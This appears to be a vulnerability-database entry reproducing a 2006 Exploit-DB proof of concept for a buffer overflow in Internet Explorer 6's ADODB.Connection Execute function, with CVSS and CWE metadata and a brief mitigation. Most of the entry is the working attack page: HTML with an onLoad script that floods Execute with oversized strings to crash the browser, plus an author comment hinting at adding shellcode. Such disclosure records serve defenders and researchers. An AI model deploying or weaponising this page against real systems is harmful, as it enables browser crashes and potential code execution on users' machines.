Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC

vendor:

Internet Explorer

by:

YAG KOHHA

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: Internet Explorer

Affected Version From: IE 6.0

Affected Version To: IE 6.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:microsoft:internet_explorer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP1/SP2

2006

Internet Explorer ‘ADODB.Connection’ object ‘Execute’ Function Vulnerability POC

This vulnerability is a buffer overflow in the ADODB.Connection object's Execute function. It affects Windows XP SP1/SP2 and IE 6.0 with the latest patches installed. The exploit causes an access violation at 77114D0F. It can be exploited with some shellcode.

Mitigation:

Update to the latest version of IE and Windows.

Source

Exploit-DB raw data:

<!--
// Internet Explorer 'ADODB.Connection' object 'Execute' Function Vulnerability POC
// tested on Windows XP SP1/XP SP2, IE 6.0 with latest patches installed
// Author: YAG KOHHA (skyhole [at] gmail.com)
// Greetz: H D Moor, Dark Eagle, str0ke, Maxus, Fuchunic, Offtopic

// Access violation at:
// ----------------------------------------------------
// 77114D0F   66:8B75 00       MOV SI,WORD PTR SS:[EBP]
// ----------------------------------------------------
// P.S. It`s will be fast with some shellcode :P
--!>

<html>
<head>
<title>ADODB.Connection.Execute CRASH TEST</title>
</head>
<script>
function Bang_Bang() {
var a = new ActiveXObject('ADODB.Connection.2.7');
var b = 'FUCK';
while (b.length <= 1024*256) b+=b;
for (var i = 0; i < 32768; i++)
try { a.Execute(b,b,b); } catch(e) {}
}
</script>
<body onLoad='Bang_Bang()'>
<center><h1>WOW!!! Are U live?</h1></center>
</body></html>

# milw0rm.com [2006-10-24]